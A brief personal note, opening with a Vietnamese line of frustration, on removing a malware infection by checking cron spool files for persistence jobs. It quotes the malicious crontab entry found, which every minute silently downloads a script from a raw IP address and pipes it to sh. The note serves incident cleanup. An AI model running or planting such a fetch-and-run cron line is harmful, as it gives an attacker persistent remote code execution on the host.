Note tạm đã, bị con này cay quá
Check for a cron job:
check if there is a cron job that would reinitialized the malware.
I found mine in: /var/spool/cron/apache >
UBUNTU /var/spool/cron/crontabs/www-data
It included the following :
* * * * * wget -q -O – http://195.3.146.118/lr.sh | sh > /dev/null 2>&1